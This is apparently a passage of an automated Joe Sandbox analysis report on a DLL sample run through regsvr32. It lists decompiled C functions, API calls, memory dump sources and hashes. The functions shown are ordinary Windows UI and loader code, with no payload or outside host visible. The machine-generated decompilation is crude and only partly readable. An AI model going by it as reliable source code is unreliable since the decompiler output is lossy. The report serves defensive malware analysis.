                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Edit
                                                                              • API String ID: 0-554135844
                                                                              • Opcode ID: 758373600aedfcbe2e5f0ce7f078fa33e10ae5c1831797e335b79b1a6240a2c6
                                                                              • Instruction ID: 76cd291436348cbb9f21bb262f43f7c3ada1ee6e8fc1c2b05e3460e8f0811d34
                                                                              • Opcode Fuzzy Hash: 758373600aedfcbe2e5f0ce7f078fa33e10ae5c1831797e335b79b1a6240a2c6
                                                                              • Instruction Fuzzy Hash: E4119E3270064282EF19DB62F9143BD22A4FB89BE8F954529CE0E87754DF78DA84C712
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001D840 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 48windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 28%
                                                                              			E1001D840(void* __ecx, signed int __edx, void* __eflags, void* __rax, void* __rcx, void* __rdx, void* __r8, void* __r11) {
				signed int _t11;
				void* _t12;
				void* _t25;
				void* _t26;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t38;

				_t38 = __r11;
				_t25 = __rax;
				_t13 = __edx;
				_t12 = __ecx;
				_t34 = __r8;
				_t35 = __rdx;
				_t33 = __rcx;
				_t11 = __edx & 0x0000ffff;
				E10012674(__rcx);
				if(_t25 == 0) {
					E10016544();
					asm("int3");
				}
				if( *((intOrPtr*)(_t25 + 0xc4)) == 0 || _t34 != 0 || _t11 == 0xe146 || _t11 == 0xe147 || _t11 == 0xe145) {
					return E1001340C(_t12, _t13, _t25, _t33, _t35, _t34, _t38);
				} else {
					r9d = _t26 + 0x10000;
					r8d = 0;
					SendMessageW(??, ??, ??, ??);
					if(_t25 == 0) {
						r9d = 0;
						r8d = 0xe147;
						SendMessageW(??, ??, ??, ??);
					}
					return 1;
				}
			}











                                                                              0x1001d840
                                                                              0x1001d840
                                                                              0x1001d840
                                                                              0x1001d840
                                                                              0x1001d849
                                                                              0x1001d84c
                                                                              0x1001d84f
                                                                              0x1001d852
                                                                              0x1001d855
                                                                              0x1001d85d
                                                                              0x1001d85f
                                                                              0x1001d864
                                                                              0x1001d864
                                                                              0x1001d86c
                                                                              0x00000000
                                                                              0x1001d88b
                                                                              0x1001d88f
                                                                              0x1001d896
                                                                              0x1001d89e
                                                                              0x1001d8a7
                                                                              0x1001d8ad
                                                                              0x1001d8b5
                                                                              0x1001d8bb
                                                                              0x1001d8bb
                                                                              0x00000000
                                                                              0x1001d8c1

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: E$F$G
                                                                              • API String ID: 3850602802-2285628837
                                                                              • Opcode ID: 2052d4f00b520989960b48a7586a8ac7c28cdaf11f1ff6e93eda6972d19bb21d
                                                                              • Instruction ID: adc2d354efc32ae6f97eeba2de68ceffe0632a6c42b4951c11c346b270e362c8
                                                                              • Opcode Fuzzy Hash: 2052d4f00b520989960b48a7586a8ac7c28cdaf11f1ff6e93eda6972d19bb21d
                                                                              • Instruction Fuzzy Hash: 3E01F271B6169482FA16B322DD807E81660EB49BE9F194532DE040FBC0DE38E8C18320
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1000C298 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressErrorHandleLastModuleProc
                                                                              • String ID: GDI32.DLL$SetLayout
                                                                              • API String ID: 4275029093-2147214759
                                                                              • Opcode ID: 5c63bcb52b0e637c5c79ee5632a8ce8d70c97fa071642f77d5805311ab093d8f
                                                                              • Instruction ID: 4fb9b25bc66e0570287a5001d11ed9cf542cf9562ad205b8547ce7c3c798e27c
                                                                              • Opcode Fuzzy Hash: 5c63bcb52b0e637c5c79ee5632a8ce8d70c97fa071642f77d5805311ab093d8f
                                                                              • Instruction Fuzzy Hash: 38F0A03270074583EB029BE5FC947E82351EB8D7E5F8641368E6E87794CEA88CCA8700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003CD20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FlsGetValue.KERNEL32(?,?,00000000,100482A0), ref: 1003CD34
                                                                              • GetModuleHandleA.KERNEL32(?,?,00000000,100482A0), ref: 1003CD4F
                                                                              • GetProcAddress.KERNEL32(?,?,00000000,100482A0), ref: 1003CD64
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProcValue
                                                                              • String ID: EncodePointer$KERNEL32.DLL
                                                                              • API String ID: 144840598-3682587211
                                                                              • Opcode ID: 8ae8655404ec35c1dece149e3a295e680bfa1f0c15c22a9dce08e62b5852be71
                                                                              • Instruction ID: ddcfca33b790dd42cb9cba5821be839d31d40e21c3fb167bb42fdc55b16de81c
                                                                              • Opcode Fuzzy Hash: 8ae8655404ec35c1dece149e3a295e680bfa1f0c15c22a9dce08e62b5852be71
                                                                              • Instruction Fuzzy Hash: B2F0E23030260485ED5BCF16AC507F417A0EB0EB92F890039AD5E4A3A0DF7888C6C710
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003CD90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FlsGetValue.KERNEL32(?,?,?,?,1004824D), ref: 1003CD9F
                                                                              • GetModuleHandleA.KERNEL32(?,?,?,?,1004824D), ref: 1003CDBA
                                                                              • GetProcAddress.KERNEL32(?,?,?,?,1004824D), ref: 1003CDCF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProcValue
                                                                              • String ID: EncodePointer$KERNEL32.DLL
                                                                              • API String ID: 144840598-3682587211
                                                                              • Opcode ID: 0e0ec2e03346893493f5d64a4146d7aafcfae7287e6e6c04013504f5f644ed6c
                                                                              • Instruction ID: c1003c439be5e5835cea0ded186bb584665c4e33b10b36ee78ab9359fa08787a
                                                                              • Opcode Fuzzy Hash: 0e0ec2e03346893493f5d64a4146d7aafcfae7287e6e6c04013504f5f644ed6c
                                                                              • Instruction Fuzzy Hash: 1FF0653070260486ED4BDB22AC947F427E0EB0D752F82053AE45E8A7A0DFBC88C6CB11
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1000C248 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressErrorHandleLastModuleProc
                                                                              • String ID: GDI32.DLL$GetLayout
                                                                              • API String ID: 4275029093-2396518106
                                                                              • Opcode ID: 8e2a18b35e0c30741f26c7ea979865d692a9a4d5eb2ca31ec9e822e9eae6f670
                                                                              • Instruction ID: 1fbf5b188125a5a87ab281540d402fb30ec05d2bc4a3b44ed4b8bfa488662989
                                                                              • Opcode Fuzzy Hash: 8e2a18b35e0c30741f26c7ea979865d692a9a4d5eb2ca31ec9e822e9eae6f670
                                                                              • Instruction Fuzzy Hash: 4BE04F30705605C2EF469BB1FC943D43320EB4DB95F890224897E4B7A4DE6CD8CD8710
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003B340 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(?,?,00000028,100395A5,?,?,?,?,1003D3CA,?,?,?,?,10042A23), ref: 1003B34F
                                                                              • GetProcAddress.KERNEL32(?,?,00000028,100395A5,?,?,?,?,1003D3CA,?,?,?,?,10042A23), ref: 1003B364
                                                                              • ExitProcess.KERNEL32 ref: 1003B375
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressExitHandleModuleProcProcess
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 75539706-1276376045
                                                                              • Opcode ID: 5a76bb7443a32f596e5bb29a3cf0c402af9006747b3af27ef4578f12751e1225
                                                                              • Instruction ID: 1c6c09ae8f0e6d384cfc06381cdf074a786e0680522aedadafa4d9a935257590
                                                                              • Opcode Fuzzy Hash: 5a76bb7443a32f596e5bb29a3cf0c402af9006747b3af27ef4578f12751e1225
                                                                              • Instruction Fuzzy Hash: 19E0EC70312A0491EF4AAB60AC943E82390AB5D745F46142E849E06360DEA8C689C701
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100087C0 Relevance: 7.7, APIs: 5, Instructions: 155windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 74%
                                                                              			E100087C0(void* __ebx, signed int __ecx, void* __esi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9, void* __r11, long long __r12, long long __r13, long long __r14) {
				void* _t74;
				void* _t75;
				intOrPtr _t76;
				intOrPtr _t77;
				void* _t78;
				void* _t89;
				intOrPtr _t90;
				void* _t98;
				void* _t122;
				void* _t126;
				long long _t127;
				intOrPtr* _t128;
				intOrPtr* _t129;
				long long _t131;
				long long _t133;
				void* _t134;
				void* _t136;
				long long _t140;
				long long _t141;
				long long _t142;
				void* _t148;
				long long _t149;
				intOrPtr* _t150;
				void* _t153;
				intOrPtr* _t154;
				long long _t156;

				_t156 = __r14;
				_t146 = __r11;
				_t137 = __r8;
				_t131 = __rsi;
				_t122 = __rdx;
				_t89 = __esi;
				_t79 = __ecx;
				_t75 = __ebx;
				_t98 = _t136;
				 *((long long*)(_t98 + 8)) = __rbx;
				 *((long long*)(_t98 + 0x10)) = _t133;
				 *((long long*)(_t98 + 0x18)) = __rsi;
				 *((long long*)(_t98 + 0x20)) = __rdi;
				 *((long long*)(_t98 - 8)) = __r12;
				_t134 = __rcx;
				 *((long long*)(_t98 - 0x10)) = __r13;
				E1000B83C();
				r9d = 1;
				_t153 = __rcx + 0xe0;
				r8d = __r9 + 0x1f;
				 *((intOrPtr*)(_t136 + 0x20)) = 0xffffff;
				E1000B51C(__ecx, 0x65a3, _t98, _t153, __rdx, __rsi, __rcx, __r8, __r11, __r12);
				r9d = 1;
				_t126 = _t134 + 0xf0;
				r8d = __r9 + 0xf;
				 *((intOrPtr*)(_t136 + 0x20)) = 0xffffff;
				E1000B51C(_t79, 0x65a2, _t98, _t126, _t122, __rsi, _t134, _t137, __r11, __r12);
				_t148 = _t134 + 0x100;
				_t14 = _t122 - 0x72; // 0x10
				r8d = _t14;
				r9d = 1;
				 *((intOrPtr*)(_t136 + 0x20)) = 0xff;
				E1000B51C(_t79, 0x82, _t98, _t148, _t122, __rsi, _t134, _t137, __r11, _t148);
				E1000A57C(_t75, _t79, 0x82, _t89, _t98, _t137, __r9, __r11);
				r9d = 1;
				r8d = __r9 + 6;
				E100081D0(_t79, 0x82, _t89, _t98,  *((intOrPtr*)(_t134 + 0xe8)),  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0xc8)))),  *((intOrPtr*)(_t134 + 0xe8)), _t126, __rsi, _t137, __r9, __r11, _t148);
				E1000A57C(_t75, _t79, 0x82, _t89, _t98, _t137, __r9, _t146);
				r9d = 1;
				_t124 =  *((intOrPtr*)(_t134 + 0xf8));
				r8d = __r9 + 6;
				E100081D0(_t79, 0x82, _t89, _t98,  *((intOrPtr*)(_t134 + 0xf8)),  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0xc8)))),  *((intOrPtr*)(_t134 + 0xf8)), _t126, _t131, _t137, __r9, _t146, _t148);
				_t90 = 0;
				if(_t153 != 0) {
					_t140 =  *((intOrPtr*)(_t153 + 8));
				} else {
					_t140 = _t131;
				}
				r8d = 0;
				SendMessageW(??, ??, ??, ??);
				E1000B47C(_t75, 0x1003, _t98, _t98, _t124, _t137, _t140, _t146);
				if(_t126 != 0) {
					_t141 =  *((intOrPtr*)(_t126 + 8));
				} else {
					_t141 = _t131;
				}
				r8d = 1;
				SendMessageW(??, ??, ??, ??);
				E1000B47C(_t75, 0x1003, _t98, _t98, _t124, _t137, _t141, _t146);
				if(_t148 != 0) {
					_t142 =  *((intOrPtr*)(_t148 + 8));
				} else {
					_t142 = _t131;
				}
				r8d = 2;
				 *((long long*)(_t136 + 0xb0)) = _t156;
				SendMessageW(??, ??, ??, ??);
				E1000B47C(_t75, 0x1003, _t98, _t98, _t124, _t137, _t142, _t146);
				 *((intOrPtr*)(_t136 + 0x30)) = 0xf;
				_t76 = _t90;
				_t149 = _t131;
				_t154 = 0x10070f70;
				_t127 = _t131;
				do {
					 *((long long*)(_t136 + 0x40)) =  *_t154;
					 *((intOrPtr*)(_t136 + 0x38)) =  *((intOrPtr*)(_t127 + 0x10070fd0));
					 *((intOrPtr*)(_t136 + 0x34)) =  *((intOrPtr*)(_t127 + 0x10070fb0));
					 *((intOrPtr*)(_t136 + 0x4c)) = _t76;
					SendMessageW(??, ??, ??, ??);
					_t76 = _t76 + 1;
					_t149 = _t149 + 1;
					_t154 = _t154 + 8;
					_t127 = _t127 + 4;
				} while (_t76 < 8);
				_t77 = _t90;
				_t128 = 0x10070ff0;
				do {
					r8d = 0;
					 *((long long*)(_t136 + 0x78)) =  *_t128;
					 *((intOrPtr*)(_t136 + 0x60)) = 0xb;
					 *((intOrPtr*)(_t136 + 0x64)) = _t77;
					 *((intOrPtr*)(_t136 + 0x68)) = _t90;
					 *((intOrPtr*)(_t136 + 0x84)) = _t77;
					 *((intOrPtr*)(_t136 + 0x70)) = 0xf000;
					 *((intOrPtr*)(_t136 + 0x6c)) = 0x1000;
					SendMessageW(??, ??, ??, ??);
					_t77 = _t77 + 1;
					_t128 = _t128 + 0x40;
				} while (_t77 < 7);
				_t150 = 0x10070ff8;
				do {
					_t78 = 1;
					_t129 = _t150;
					do {
						r8d = _t78;
						_t74 = E1000AF20(_t90, _t134,  *_t129);
						_t78 = _t78 + 1;
						_t129 = _t129 + 8;
					} while (_t78 < 8);
					_t90 = _t90 + 1;
					_t150 = _t150 + 0x40;
				} while (_t90 < 7);
				return _t74;
			}





























                                                                              0x100087c0
                                                                              0x100087c0
                                                                              0x100087c0
                                                                              0x100087c0
                                                                              0x100087c0
                                                                              0x100087c0
                                                                              0x100087c0
                                                                              0x100087c0
                                                                              0x100087c0
                                                                              0x100087ca
                                                                              0x100087ce
                                                                              0x100087d2
                                                                              0x100087d6
                                                                              0x100087da
                                                                              0x100087de
                                                                              0x100087e1
                                                                              0x100087e5
                                                                              0x100087ea
                                                                              0x100087f0
                                                                              0x100087f7
                                                                              0x10008803
                                                                              0x1000880b
                                                                              0x10008810
                                                                              0x10008816
                                                                              0x1000881d
                                                                              0x10008829
                                                                              0x10008831
                                                                              0x1000883b
                                                                              0x10008842
                                                                              0x10008842
                                                                              0x10008846
                                                                              0x1000884f
                                                                              0x10008857
                                                                              0x10008863
                                                                              0x1000886f
                                                                              0x1000887b
                                                                              0x1000887f
                                                                              0x1000888b
                                                                              0x10008897
                                                                              0x1000889d
                                                                              0x100088a3
                                                                              0x100088a7
                                                                              0x100088ac
                                                                              0x100088b1
                                                                              0x100088b8
                                                                              0x100088b3
                                                                              0x100088b3
                                                                              0x100088b3
                                                                              0x100088c0
                                                                              0x100088c8
                                                                              0x100088d1
                                                                              0x100088d9
                                                                              0x100088e0
                                                                              0x100088db
                                                                              0x100088db
                                                                              0x100088db
                                                                              0x100088ed
                                                                              0x100088f3
                                                                              0x100088fc
                                                                              0x10008904
                                                                              0x1000890b
                                                                              0x10008906
                                                                              0x10008906
                                                                              0x10008906
                                                                              0x10008919
                                                                              0x1000891f
                                                                              0x10008927
                                                                              0x10008930
                                                                              0x10008935
                                                                              0x1000893d
                                                                              0x1000893f
                                                                              0x10008942
                                                                              0x10008949
                                                                              0x10008953
                                                                              0x10008960
                                                                              0x10008970
                                                                              0x10008981
                                                                              0x10008985
                                                                              0x10008989
                                                                              0x1000898f
                                                                              0x10008992
                                                                              0x10008996
                                                                              0x1000899a
                                                                              0x1000899e
                                                                              0x100089b3
                                                                              0x100089b5
                                                                              0x100089c0
                                                                              0x100089cc
                                                                              0x100089d4
                                                                              0x100089d9
                                                                              0x100089e1
                                                                              0x100089e5
                                                                              0x100089e9
                                                                              0x100089f0
                                                                              0x100089f8
                                                                              0x10008a00
                                                                              0x10008a06
                                                                              0x10008a09
                                                                              0x10008a0d
                                                                              0x10008a12
                                                                              0x10008a20
                                                                              0x10008a20
                                                                              0x10008a25
                                                                              0x10008a30
                                                                              0x10008a33
                                                                              0x10008a3b
                                                                              0x10008a40
                                                                              0x10008a43
                                                                              0x10008a47
                                                                              0x10008a4c
                                                                              0x10008a4f
                                                                              0x10008a53
                                                                              0x10008a87

                                                                              APIs
                                                                                • Part of subcall function 100081D0: GetModuleHandleW.KERNEL32 ref: 10008230
                                                                                • Part of subcall function 100081D0: LoadLibraryW.KERNEL32 ref: 10008243
                                                                                • Part of subcall function 100081D0: GetProcAddress.KERNEL32 ref: 10008261
                                                                                • Part of subcall function 100081D0: GetLastError.KERNEL32 ref: 100082A7
                                                                                • Part of subcall function 100081D0: SetLastError.KERNEL32 ref: 100082C1
                                                                              • SendMessageW.USER32 ref: 100088C8
                                                                              • SendMessageW.USER32 ref: 100088F3
                                                                              • SendMessageW.USER32 ref: 10008927
                                                                              • SendMessageW.USER32 ref: 10008989
                                                                              • SendMessageW.USER32 ref: 10008A00
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$ErrorLast$AddressHandleLibraryLoadModuleProc
                                                                              • String ID:
                                                                              • API String ID: 429517210-0
                                                                              • Opcode ID: 8f82d6b786561f426b2259828a86568ec76317e3cd1ad9d8f1443d95ef9667a3
                                                                              • Instruction ID: 3feb9d593aed762aded6b613cbd3aa2a4daf2b5e2e638b613d995c92462a7bd8
                                                                              • Opcode Fuzzy Hash: 8f82d6b786561f426b2259828a86568ec76317e3cd1ad9d8f1443d95ef9667a3
                                                                              • Instruction Fuzzy Hash: BB616976B04A81C6E760DF12E840B8E7760F789BC8F954126EE8D57B09CF7AD685CB40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001AA38 Relevance: 7.6, APIs: 5, Instructions: 114windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 56%
                                                                              			E1001AA38(void* __ebx, void* __ecx, void* __edi, signed int __rax, void* __rcx, intOrPtr* __rdx, intOrPtr __r8, void* __r9, void* __r11) {
				void* __rbx;
				void* __rbp;
				void* __r12;
				void* _t22;
				int _t29;
				intOrPtr _t39;
				signed int _t44;
				signed int _t46;
				signed int _t47;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t72;
				void* _t73;
				intOrPtr* _t78;
				signed int _t79;

				_t77 = __r11;
				_t74 = __r8;
				_t70 = __rdx;
				_t57 = __rax;
				_t37 = __ebx;
				 *((long long*)(_t73 + 0x20)) = 0xfffffffe;
				r15d = r8d;
				_t78 = __rdx;
				_t72 = __rcx;
				r8d = 0x18;
				_t22 = E1001A3E8(__ebx, __ecx, r15d, __edi, __rcx, __r8, __r9, __r11, __rdx);
				if(_t22 == 0) {
					return _t22;
				}
				_t47 = 1;
				if(_t78 == 0) {
					L19:
					r8d = 1;
					E1001A720(1, _t72);
					return _t47;
				}
				r9d = 0;
				r8d = 0;
				SendMessageW(??, ??, ??, ??);
				_t58 = _t57;
				_t44 = 0;
				E1000CAC4(__ebx, _t73 + 0x28, _t70, __r8, __r11);
				r13d = 0;
				if(_t58 != 0) {
					_t70 = _t58;
					SelectObject(??, ??);
					_t79 = _t57;
				}
				_t59 =  *((intOrPtr*)(_t72 + 0xd0));
				_t46 = 0;
				if(r15d <= 0) {
					L16:
					__eflags = _t79;
					if(__eflags != 0) {
						_t70 = _t79;
						SelectObject(??, ??);
					}
					E1000CB4C(__eflags, _t59, _t73 + 0x28, _t70);
					goto L19;
				} else {
					while(1) {
						_t39 =  *_t78;
						 *_t59 = _t39;
						_t78 = _t78 + 4;
						 *(_t59 + 0xc) =  *(_t59 + 0xc) | 0x00000001;
						r14d = _t39;
						if(_t39 == 0) {
							goto L10;
						}
						E10028FE0(_t57);
						if(_t57 == 0) {
							L15:
							_t47 = 0;
							__eflags = 0;
							goto L16;
						}
						r8d = r14d;
						_t70 = _t57;
						if(E10009BA4(_t57, _t59 + 0x10, _t57, _t74, _t77) == 0) {
							goto L15;
						}
						_t70 =  *((intOrPtr*)(_t59 + 0x10));
						r8d =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x10)) - 0x10));
						GetTextExtentPoint32W(??, ??, ??, ??);
						r11d =  *(_t73 + 0xb8);
						 *(_t59 + 4) = r11d;
						r9d = 0;
						_t74 =  *((intOrPtr*)(_t59 + 0x10));
						_t44 = _t46;
						if(E1001A5A8(_t37, _t44, _t72, _t72,  *((intOrPtr*)(_t59 + 0x10)), _t73 + 0xb8) == 0) {
							_t47 = 0;
							goto L16;
						}
						L12:
						_t59 = _t59 + 0x18;
						_t46 = _t46 + 1;
						if(_t46 >= r15d) {
							goto L16;
						}
						continue;
						L10:
						_t29 = GetSystemMetrics();
						asm("cdq");
						_t44 = _t44 & 0x00000003;
						 *(_t59 + 4) = _t29 + _t44 >> 2;
						__eflags = _t46;
						if(_t46 == 0) {
							_t18 = _t59 + 8;
							 *_t18 =  *(_t59 + 8) | 0x08000100;
							__eflags =  *_t18;
						}
						goto L12;
					}
				}
			}



















                                                                              0x1001aa38
                                                                              0x1001aa38
                                                                              0x1001aa38
                                                                              0x1001aa38
                                                                              0x1001aa38
                                                                              0x1001aa49
                                                                              0x1001aa52
                                                                              0x1001aa55
                                                                              0x1001aa58
                                                                              0x1001aa5b
                                                                              0x1001aa64
                                                                              0x1001aa6b
                                                                              0x1001abb7
                                                                              0x1001abb7
                                                                              0x1001aa71
                                                                              0x1001aa79
                                                                              0x1001ab95
                                                                              0x1001ab9a
                                                                              0x1001aba0
                                                                              0x00000000
                                                                              0x1001aba5
                                                                              0x1001aa7f
                                                                              0x1001aa82
                                                                              0x1001aa8c
                                                                              0x1001aa92
                                                                              0x1001aa95
                                                                              0x1001aa9c
                                                                              0x1001aaa2
                                                                              0x1001aaa8
                                                                              0x1001aaaa
                                                                              0x1001aab2
                                                                              0x1001aab8
                                                                              0x1001aab8
                                                                              0x1001aabb
                                                                              0x1001aac2
